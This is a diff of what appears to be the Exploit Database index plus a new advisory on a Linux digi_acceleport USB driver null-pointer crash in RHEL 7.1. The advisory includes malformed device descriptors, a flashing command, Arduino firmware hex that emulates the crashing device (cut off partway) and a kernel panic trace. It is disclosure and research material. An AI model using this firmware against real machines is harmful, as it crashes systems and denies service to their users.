32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0
32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/VISTA/2003/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0
@ -29783,7 +29783,7 @@ id,file,description,date,author,platform,type,port
33009,platforms/asp/webapps/33009.txt,"DotNetNuke <= 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting Vulnerability",2009-05-22,"ben hawkes",asp,webapps,0
33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String Vulnerability",2009-05-26,lofi42,hardware,remote,0
33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection Vulnerability",2009-05-27,"Gerendi Sandor Attila",php,webapps,0
33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0
33012,platforms/windows/local/33012.c,"Microsoft Windows 2000/XP/2003 - Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0
33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting Vulnerability",2009-05-15,"Gerendi Sandor Attila",php,webapps,0
33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0
33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0
@ -30083,7 +30083,7 @@ id,file,description,date,author,platform,type,port
33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0
33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0
33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0
33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 - Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0
33593,platforms/windows/local/33593.c,"Microsoft Windows 2000/XP/2003/Vista - Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0
33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0
33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0
33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0
@ -30095,7 +30095,7 @@ id,file,description,date,author,platform,type,port
33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80
33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
@ -34087,7 +34087,7 @@ id,file,description,date,author,platform,type,port
37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
37755,platforms/windows/local/37755.c,"Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
37948,platforms/php/webapps/37948.txt,"Wordpress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0
37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass Vulnerability",2012-10-17,"Bernhard Mueller",linux,remote,0
@ -35375,7 +35375,7 @@ id,file,description,date,author,platform,type,port
39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0
39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
@ -35763,4 +35763,19 @@ id,file,description,date,author,platform,type,port
39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,metasploit,windows,local,0
39524,platforms/php/webapps/39524.js,"ATutor LMS install_modules.php CSRF Remote Code Execution Vulnerability",2016-03-07,mr_me,php,webapps,0
39525,platforms/win64/local/39525.py,"Microsoft Windows - AFD.SYS Privilege Escalation (MS14-040) Win7x64",2016-03-07,"Rick Larabee",win64,local,0
39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0
39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0
39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions <= 4.5.0 - .pdf Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0
39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80
39535,platforms/linux/local/39535.sh,"exim <= 4.84-3 - Local Root Exploit",2016-03-09,"Hacker Fantastic",linux,local,0
39536,platforms/php/webapps/39536.txt,"WordPress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80
39537,platforms/linux/dos/39537.txt,"Linux Kernel - digi_acceleport Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39538,platforms/linux/dos/39538.txt,"Linux Kernel - Wacom Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0
39539,platforms/linux/dos/39539.txt,"Linux Kernel - visor (treo_attach) Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39540,platforms/linux/dos/39540.txt,"Linux Kernel - visor clie_5_attach Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39542,platforms/linux/dos/39542.txt,"Linux Kernel - cypress_m8 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39541,platforms/linux/dos/39541.txt,"Linux Kernel - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39543,platforms/linux/dos/39543.txt,"Linux Kernel - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39544,platforms/linux/dos/39544.txt,"Linux Kernel - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39545,platforms/linux/dos/39545.txt,"Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0

Can't render this file because it is too large.

605
platforms/linux/dos/39537.txt Executable file
View file

@ -0,0 +1,605 @@
OS-S Security Advisory 2016-12
Linux digi_acceleport Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
USB device descriptors (digi_acceleport driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net/advisories/OSS-2016-11_wacom.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the digi_acceleport driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x5c5
idProduct: 0x2
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
The digi_acceleport driver does not use the num_ports (struct usb_serial)
value for any kind of sanity checks during the initialization process
(digi_port_init & digi_startup). Due to an incomplete sanity check, the driver
could try to dereference a null-pointer if a malformed device-descriptor is
presented (zero-value for bNumEndpoints or no described endpoint-descriptors).
This results in a crash of the system.
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x0
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this
Security Advisory.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283378
Kernel Stacktrace:
[ 39.946974] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 40.160503] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint
descriptors, different from the interface descriptor's value: 0
[ 40.191627] usb 1-1: New USB device found, idVendor=05c5, idProduct=0002
[ 40.200660] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 40.210919] usb 1-1: Product: Ä?
[ 40.216028] usb 1-1: Manufacturer: Ä?
[ 40.220047] usb 1-1: SerialNumber: %
[ 40.285649] usbcore: registered new interface driver digi_acceleport
[ 40.295629] usbserial: USB Serial support registered for Digi 2 port USB
adapter
[ 40.302062] usbserial: USB Serial support registered for Digi 4 port USB
adapter
[ 40.318968] digi_acceleport 1-1:1.0: Digi 2 port USB adapter converter
detected
[ 40.327158] BUG: unable to handle kernel NULL pointer dereference at
0000000000000268
[ 40.328013] IP: [<ffffffff81097dca>] __init_waitqueue_head+0xa/0x20
[ 40.328013] PGD 0
[ 40.328013] Oops: 0002 [#1] SMP
[ 40.328013] Modules linked in: digi_acceleport(+) ip6t_rpfilter ip6t_REJECT
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 40.328013] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 40.328013] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 40.328013] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 40.328013] RIP: 0010:[<ffffffff81097dca>] [<ffffffff81097dca>]
__init_waitqueue_head+0xa/0x20
[ 40.328013] RSP: 0018:ffff88000bd23a30 EFLAGS: 00010282
[ 40.328013] RAX: 0000000000000270 RBX: ffff88000af97d80 RCX: 0000000000000000
[ 40.328013] RDX: ffffffffa03978f8 RSI: ffffffffa0396577 RDI: 0000000000000268
[ 40.328013] RBP: ffff88000bd23a58 R08: 0000000000016440 R09: ffff88000e401800
[ 40.328013] R10: ffffffffa039531a R11: ffff88000c3b9800 R12: 0000000000000000
[ 40.328013] R13: 0000000000000003 R14: ffff88000af97840 R15: ffffffffa0397200
[ 40.328013] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 40.328013] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 40.328013] CR2: 0000000000000268 CR3: 000000000cb80000 CR4:
00000000000006f0
[ 40.328013] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 40.328013] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 40.328013] Stack:
[ 40.328013] ffff88000bd23a58 ffffffffa03953bf ffff88000d685d00 ffff88000af97840
[ 40.328013] ffff88000c525830 ffff88000bd23a80 ffffffffa0395464 ffff88000bd23a80
[ 40.328013] ffff88000af97858 ffff88000af97858 ffff88000bd23c18 ffffffff8145fed1
[ 40.328013] Call Trace:
[ 40.328013] [<ffffffffa03953bf>] ? digi_port_init+0xcf/0x100 [digi_acceleport]
[ 40.328013] [<ffffffffa0395464>] digi_startup+0x54/0x98 [digi_acceleport]
[ 40.328013] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230
[ 40.328013] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0
[ 40.328013] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0
[ 40.328013] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0
[ 40.328013] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100
[ 40.328013] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 40.328013] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 40.328013] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 40.328013] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 40.328013] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 40.328013] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 40.328013] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580
[ 40.328013] [<ffffffffa039a000>] ? 0xffffffffa0399fff
[ 40.328013] [<ffffffffa039a01e>] usb_serial_module_init+0x1e/0x1000
[digi_acceleport]
[ 40.328013] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 40.328013] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 40.328013] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 40.328013] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 40.328013] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 40.328013] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 40.328013] Code: 00 48 c7 c7 50 32 d6 81 e8 74 38 57 00 e9 37 ff ff ff e8 5a
1a 57 00 e9 61 ff ff ff 0f 1f 44 00 00 0f 1f 44 00 00 55 48 8d 47 08 <c7> 07 00
00 00 00 48 89 e5 48 89 47 08 48 89 47 10 5d c3 0f 1f
[ 40.328013] RIP [<ffffffff81097dca>] __init_waitqueue_head+0xa/0x20
[ 40.328013] RSP <ffff88000bd23a30>
[ 40.328013] CR2: 0000000000000268
[ 40.772818] ---[ end trace b239663354a1c556 ]---
[ 40.778676] Kernel panic - not syncing: Fatal exception
[ 40.779642] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C2050C942D04CE
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940C02C3
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C50009030C0306
:1000B000FF0203032D032D032D0310031403180364
:1000C0001E0322032D0328030000000200080E0077
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E0EDF3E102C005900D92A436B107D5
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9402070C940000089547
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E949F020E94C70060E06D
:1001B00083E00E942E0361E087E00E942E0361E04D
:1001C00088E00E942E030E9457067E012AE9E20E73
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93F90168
:1002C0009082E4E0D9011196EC93F901DC01292D2B
:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB
:1002E0001B96FC93EE931A971D96BC92AE921C97A8
:1002F0001183008373836283558344830C521109F5
:100300002CE0F80111922A95E9F721E0D80119961D
:100310002C931997FE01E059FF4F01900D929A948A
:10032000E1F7F8019387828761E088E00E94670324
:100330008BE492E00E94630688E892E00E946306E4
:1003400087EC92E00E94630686E093E00E946306D9
:1003500082E493E00E9463068FE793E00E946306C5
:1003600084EA93E00E9463068BEE93E00E946306AA
:1003700083E00E949D03892B09F047C05E01F3E2F0
:10038000AF0EB11C8824839482E1982E84E194E01E
:100390000E946306BF92AF92DF92CF92FF92EF92DC
:1003A0001F928F921F930F932DB73EB722513109A1
:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6
:1003C000FE01FB96892D01900D928A95E1F78DE64D
:1003D00095E00E94010668E873E180E090E00E94E9
:1003E00079028DE695E00E944C0660E087E00E946D
:1003F000670368E873E180E090E00E9479020FB63D
:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0
:1004100090E00E947902ACCF1F920F920FB60F921C
:1004200011242F933F938F939F93AF93BF9380910A
:10043000650590916605A0916705B09168053091BA
:10044000640523E0230F2D3720F40196A11DB11D73
:1004500005C026E8230F0296A11DB11D2093640557
:100460008093650590936605A0936705B093680532
:100470008091690590916A05A0916B05B0916C051A
:100480000196A11DB11D8093690590936A05A09303
:100490006B05B0936C05BF91AF919F918F913F9188
:1004A0002F910F900FBE0F901F9018953FB7F894A3
:1004B0008091690590916A05A0916B05B0916C05DA
:1004C00026B5A89B05C02F3F19F00196A11DB11DAF
:1004D0003FBF6627782F892F9A2F620F711D811DCC
:1004E000911D42E0660F771F881F991F4A95D1F72B
:1004F0000895CF92DF92EF92FF92CF93DF936B013B
:100500007C010E945602EB01C114D104E104F10404
:1005100079F00E9456026C1B7D0B683E7340A0F37D
:1005200081E0C81AD108E108F108C851DC4FECCFCE
:10053000DF91CF91FF90EF90DF90CF900895789466
:1005400084B5826084BD84B5816084BD85B58260D8
:1005500085BD85B5816085BDEEE6F0E08081816076
:100560008083E1E8F0E01082808182608083808176
:1005700081608083E0E8F0E0808181608083E1E950
:10058000F0E0808182608083808181608083E0E907
:10059000F0E0808181608083E1ECF0E08081846024
:1005A0008083808182608083808181608083E3ECAE
:1005B000F0E0808181608083E0ECF0E08081826007
:1005C0008083E2ECF0E0808181608083EAE7F0E004
:1005D000808184608083808182608083808181606B
:1005E0008083808180688083089590E0FC0131974A
:1005F000EE30F10590F5EA5AFF4F0C94A90980916D
:1006000080008F7703C0809180008F7D8093800071
:10061000089584B58F7702C084B58F7D84BD089519
:10062000809190008F7707C0809190008F7D03C0EC
:1006300080919000877F8093900008958091C00002
:100640008F7703C08091C0008F7D8093C000089594
:100650008091C200877F8093C2000895CF93DF937B
:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A
:100670008491882349F190E0880F991FFC01E25C86
:10068000FE4FA591B491805D9E4FFC01C591D49120
:100690009FB7611108C0F8948C91209582238C93A8
:1006A000888182230AC0623051F4F8948C91322FF1
:1006B000309583238C938881822B888304C0F8949F
:1006C0008C91822B8C939FBFDF91CF9108950F93D4
:1006D0001F93CF93DF931F92CDB7DEB7282F30E063
:1006E000F901E853FF4F8491F901EA51FF4F14914A
:1006F000F901EC5FFE4F04910023C9F0882321F03B
:1007000069830E94F5026981E02FF0E0EE0FFF1F80
:10071000E05DFE4FA591B4919FB7F8948C91611163
:1007200003C01095812301C0812B8C939FBF0F9034
:10073000DF91CF911F910F910895CF93DF93282FD1
:1007400030E0F901E853FF4F8491F901EA51FF4F7E
:10075000D491F901EC5FFE4FC491CC2391F081114B
:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52
:10077000A591B4912C912D2381E090E021F480E0AB
:1007800002C080E090E0DF91CF910895615030F099
:100790002091F100FC0120830196F8CF289884E68F
:1007A00080937D0508951092E900109271051092D2
:1007B000700590936F0580936E050895FF920F93D7
:1007C0001F93CF93DF93F82E8B01EA01BA01C80182
:1007D0000E94A406F80120E030E08EEF2C173D07C0
:1007E00091F1F7FE02C0A49101C0A0816091700553
:1007F0007091710540916E0550916F0564177507F2
:10080000ACF49091E8009570E1F39091E80092FDCE
:100810001CC0A093F100A0917005B09171051196D4
:10082000AF73BB27AB2B11F48093E800A091700548
:10083000B09171051196B0937105A09370052F5F6B
:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1
:10085000CF911F910F91FF9008951F920F920FB6A5
:100860000F9211246F927F928F929F92AF92BF92BC
:10087000CF92DF92EF92FF920F931F932F933F93AC
:100880004F935F936F937F938F939F93AF93BF9398
:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1
:1008A000CDBF1092E9008091E80083FF46C168E067
:1008B000CE010A960E94C60382EF8093E8009A85D3
:1008C00097FF05C08091E80080FFFCCF03C08EEF4A
:1008D0008093E800892F807609F023C18B858111F0
:1008E00005C01092F1001092F10020C1282F2D7F39
:1008F000213009F41BC1853049F48091E80080FF64
:10090000FCCF8C8580688093E30010C1863009F0AD
:10091000E1C02D8508891989223009F0B3C0EC8423
:100920008E2D90E020917305309174058217930706
:100930000CF09FC00E94D3031F92EF928DE394E0CE
:100940009F938F930E9481068CE0E89E7001112492
:10095000E0917505F0917605EE0DFF1D89E0DE0151
:10096000119601900D928A95E1F7C8010E94D30378
:1009700049E050E0BE016F5F7F4F80E00E94DE03E0
:100980000F900F900F900F90C12CD12C612C712CD7
:1009900033E7A32E34E0B32E4AEA842E44E0942EAB
:1009A000E0917505F0917605EE0DFF1D818590E0D3
:1009B000681679060CF0BAC07F926F92BF92AF9220
:1009C0000E948106E0917505F0917605EE0DFF1D00
:1009D000628573856C0D7D1D49E050E080E00E94CA
:1009E000DE030F900F900F900F9000E010E0E09169
:1009F0007505F0917605EE0DFF1D0284F385E02D5F
:100A0000EC0DFD1D818590E0081719075CF51F931B
:100A10000F939F928F920E948106E0917505F0914D
:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16
:100A3000C801880F991FA485B585A80FB91F4D91CE
:100A40005C910284F385E02DE80FF91F60817181CC
:100A500080E00E94DE030F5F1F4F0F900F900F90FA
:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0
:100A700097CF8FED94E09F938F930E9481060F9004
:100A80000F9058C0C8012A8B0E94D3032A892130B5
:100A9000C1F0233009F04EC08C851F928F9389EFEF
:100AA00094E09F938F930E94810642E050E062E8B9
:100AB00071E080E00E94DE030F900F900F900F9086
:100AC00035C04091000150E060E071E080E00E949C
:100AD000DE032CC0873071F1883021F481E08093EF
:100AE000F10024C0893011F5937021F5EDE4F1E0B7
:100AF00081E021E096E38093E9002093EB003491BC
:100B00003093EC009093ED008F5F3196843099F72D
:100B10008EE78093EA001092EA008C85809372053C
:100B200005C0888999890E94D30304C08EEF809301
:100B3000E80003C081E28093EB0062960FB6F89460
